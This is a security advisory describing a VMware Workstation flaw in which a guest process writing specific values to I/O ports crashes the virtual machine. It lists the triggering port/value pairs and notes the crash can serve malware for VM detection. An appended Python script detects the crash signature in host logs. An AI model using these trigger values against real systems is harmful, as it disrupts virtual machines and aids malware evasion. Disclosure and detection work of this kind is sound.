VMware Workstation IO Port Request Virtualized Machine Denial Of Service
by Piotr Bania
http://www.piotrbania.com

Original url: http://www.piotrbania.com/all/adv/vmware-io-adv.txt

Severity: Low/Moderate - Denial Of Service

Vendor response: VMware was notified on 2008-06-06. Around 2009 VMware stated that, due to the low severity of this vulnerability, the issue will not be fully resolved.


I. DESCRIPTION

A few years ago Ken Kato released a document in which he described the so-called "VMware Backdoor I/O Port". In short, by sending a special request to a specified I/O port from the emulated machine he was able to "communicate" with the host machine (using a mechanism similar to the one VMware Tools uses). See http://chitchat.at.infoseek.co.jp/vmware/backdoor.html for more details.

Lately I have been researching the topic of I/O port requests issued from the virtualized machine in more depth. It appears that there exists a way to crash the virtual machine by sending a specific command to a specific I/O port number. This attack can be used to detect the presence of the virtual machine, and it can be really nasty since it leads to a total crash of the virtual machine. The good thing, of course, is that the attack itself requires the special privileges necessary for performing I/O requests. However, much current malware already runs with sufficient privileges (e.g. ring-0 rootkits), so the attack can still be performed.

Here is a shortened sample of my list of I/O ports and request values suitable for triggering the crash. These requests were also tested on physical machines of mine and did not cause any crash there; however, that should mostly depend on the manufacturer's implementation. The I/O port descriptions were taken from "XT, AT and PS/2 I/O port addresses" by Wim Osterholt. As the author himself says, the descriptions may not be fully accurate.
Sample ports and values:

--//- snip ----//------------------------------------------------------------------------

PORT: 0x20    VALUE: 0x64
*Desc: PIC 1 (Programmable Interrupt Controller 8259) - PIC initialization command word ICW1

PORT: 0x64    VALUE: 0xdd
*Desc: 8042 Keyboard command/status register - KB controller input buffer (ISA, EISA)

PORT: 0xb2    VALUE: 0x00
*Desc: ???

PORT: 0xb3    VALUE: 0x00
*Desc: ???

PORT: 0xd2    VALUE: 0x04
*Desc: DMA 2 (second Direct Memory Access controller 8237) - DMA channel 4-7 write request register (ISA, EISA)

PORT: 0x177   VALUE: 0x00
*Desc: HDC 2 (2nd Fixed Disk Controller) - same as 01Fx (ISA, EISA)

PORT: 0x1f7   VALUE: 0x00
*Desc: HDC 1 (1st Fixed Disk Controller) - same as 017x (ISA, EISA)

PORT: 0x376   VALUE: 0x00
*Desc: Floppy disk controller (except PCjr) - Diskette controller data (2nd FIXED disk controller data register)

PORT: 0x1005  VALUE: 0x00
*Desc: /1000-10FF/ ---- available for EISA slot 1

PORT: 0x102c  VALUE: 0x02
*Desc: -//-

PORT: 0x102d  VALUE: 0x02
*Desc: -//-

PORT: 0x102e  VALUE: 0x02
*Desc: -//-

PORT: 0x1042  VALUE: 0x01
*Desc: -//-

etc. etc.

--//- snip ----//------------------------------------------------------------------------

Notes:
* - the description may not be accurate

After a successful attack the virtual machine should crash and an error message similar to the following should be displayed:

"VMware Workstation unrecoverable error: (vcpu-0)
NOT_IMPLEMENTED /build/mts/release/bora-59824/bora/devices/misc/keyboard.c:2682"


II. IMPACT

A successfully performed attack leads to a crash of the virtualized machine.
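An added triage helper for the host side, not part of the original advisory: it scans VMware per-VM log lines for the NOT_IMPLEMENTED assertion in devices/misc/keyboard.c quoted above and keeps only hits raised by a vcpu thread, which is what a guest-triggered I/O write surfaces as. The log line layout (timestamp, thread name, message) and the sample lines are assumptions constructed for this example.

```python
"""Added example: find the keyboard.c NOT_IMPLEMENTED crash signature in VMware log lines."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumed line layout: "<timestamp>: <thread>| <message>", e.g. "...: vcpu-0| NOT_IMPLEMENTED ..."
LINE_RE = re.compile(r"^(?P<ts>[^|]*?):\s*(?P<thread>[\w-]+)\|\s*(?P<msg>.*)$")
# Assertion text as quoted in the advisory: "NOT_IMPLEMENTED <source path>:<line>"
NOT_IMPL_RE = re.compile(r"NOT_IMPLEMENTED\s+(?P<path>\S+?):(?P<line>\d+)")


@dataclass
class CrashHit:
    timestamp: str
    thread: str
    path: str
    line: int
    device: str  # last three path components, e.g. "devices/misc/keyboard.c"


def parse_line(raw: str) -> Optional[CrashHit]:
    """Return a CrashHit if the line carries a NOT_IMPLEMENTED assertion, else None."""
    m = LINE_RE.match(raw.rstrip("\n"))
    if not m:
        return None
    n = NOT_IMPL_RE.search(m.group("msg"))
    if not n:
        return None
    path = n.group("path")
    device = "/".join(path.split("/")[-3:])
    return CrashHit(m.group("ts"), m.group("thread"), path, int(n.group("line")), device)


def find_device_crashes(lines: Iterable[str],
                        device_suffix: str = "devices/misc/keyboard.c") -> List[CrashHit]:
    """Keep only assertions from vcpu threads whose source path ends with device_suffix.

    A vcpu thread raising the assertion is the pattern the advisory describes
    (guest I/O port write); assertions from mks/vmx threads are host-side and ignored.
    """
    hits = []
    for raw in lines:
        hit = parse_line(raw)
        if hit and hit.thread.startswith("vcpu-") and hit.path.endswith(device_suffix):
            hits.append(hit)
    return hits


# Constructed sample log lines (not real captured output; second path is a placeholder).
SAMPLE_LOG = [
    "Jun 06 10:15:01.001: vmx| Log for VMware Workstation pid=1234",
    "Jun 06 10:15:07.412: vcpu-0| NOT_IMPLEMENTED /build/mts/release/bora-59824/bora/devices/misc/keyboard.c:2682",
    "Jun 06 10:15:07.413: vcpu-0| VMware Workstation unrecoverable error: (vcpu-0)",
    "Jun 06 10:15:07.500: mks| NOT_IMPLEMENTED /build/EXAMPLE/bora/other/placeholder.c:1",
]
```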